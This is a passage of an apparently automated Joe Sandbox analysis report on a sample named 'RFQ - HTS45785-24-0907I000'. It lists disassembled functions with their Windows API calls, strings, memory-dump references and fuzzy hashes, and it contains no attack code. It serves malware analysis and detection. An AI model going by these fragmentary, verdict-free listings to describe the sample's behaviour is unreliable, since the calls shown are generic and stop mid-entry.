                                                        • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                        Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                        • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                        • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                        • DeleteObject.GDI32(?), ref: 0047151E
                                                        • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                        • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                        • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                        • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                        • DeleteObject.GDI32(?), ref: 004715EA
                                                        • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                        • String ID:
                                                        • API String ID: 3218148540-0
                                                        • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                        • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                        • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                        • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                        Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                        • String ID:
                                                        • API String ID: 136442275-0
                                                        • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                        • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                        • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                        • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                        Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _wcsncpy.LIBCMT ref: 00467490
                                                        • _wcsncpy.LIBCMT ref: 004674BC
                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                        • _wcstok.LIBCMT ref: 004674FF
                                                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                        • _wcstok.LIBCMT ref: 004675B2
                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                        • _wcslen.LIBCMT ref: 00467793
                                                        • _wcscpy.LIBCMT ref: 00467641
                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                        • _wcslen.LIBCMT ref: 004677BD
                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                        • String ID: X
                                                        • API String ID: 3104067586-3081909835
                                                        • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                        • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                        • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                        • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                        Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                        • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                        • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                        • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                        • _wcslen.LIBCMT ref: 0046CDB0
                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                        • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                        • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                          • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                          • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                          • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                        Strings
                                                        • NULL Pointer assignment, xrefs: 0046CEA6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                        • String ID: NULL Pointer assignment
                                                        • API String ID: 440038798-2785691316
                                                        • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                        • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                        • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                        • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                        Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                        • _wcslen.LIBCMT ref: 004610A3
                                                        • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                        • GetWindowRect.USER32(?,?), ref: 00461248
                                                          • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                        • String ID: ThumbnailClass
                                                        • API String ID: 4136854206-1241985126
                                                        • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                        • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                        • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                        • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                        Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                        • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                        • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                        • GetClientRect.USER32(?,?), ref: 00471A1A
                                                        • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                        • DestroyIcon.USER32(?), ref: 00471AF4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                        • String ID: 2
                                                        • API String ID: 1331449709-450215437
                                                        • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                        • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                        • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                        • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                        Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                        • __swprintf.LIBCMT ref: 00460915
                                                        • __swprintf.LIBCMT ref: 0046092D
                                                        • _wprintf.LIBCMT ref: 004609E1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                        • API String ID: 3054410614-2561132961
                                                        • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                        • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                        • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                        • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                        Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                        • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                        • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                        • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                        • API String ID: 600699880-22481851
                                                        • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                        • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                        • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                        • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                        Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: DestroyWindow
                                                        • String ID: static
                                                        • API String ID: 3375834691-2160076837
                                                        • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                        • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                        • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                        • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                        Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                        • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DriveType
                                                        • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                        • API String ID: 2907320926-3566645568
                                                        • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                        • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                        • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                        • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                        Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                        • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                        • DeleteObject.GDI32(00580000), ref: 00470A04
                                                        • DestroyIcon.USER32(00500000), ref: 00470A1C
                                                        • DeleteObject.GDI32(94177D6D), ref: 00470A34
                                                        • DestroyWindow.USER32(0049006F), ref: 00470A4C
                                                        • DestroyIcon.USER32(?), ref: 00470A73
                                                        • DestroyIcon.USER32(?), ref: 00470A81
                                                        • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                        • String ID:
                                                        • API String ID: 1237572874-0
                                                        • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                        • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                        • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                        • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                        Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                        • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                        • VariantInit.OLEAUT32(?), ref: 004793E1
                                                        • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                        • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                        • VariantClear.OLEAUT32(?), ref: 00479489
                                                        • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                        • VariantClear.OLEAUT32(?), ref: 004794CA
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                        • String ID:
                                                        • API String ID: 2706829360-0
                                                        • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
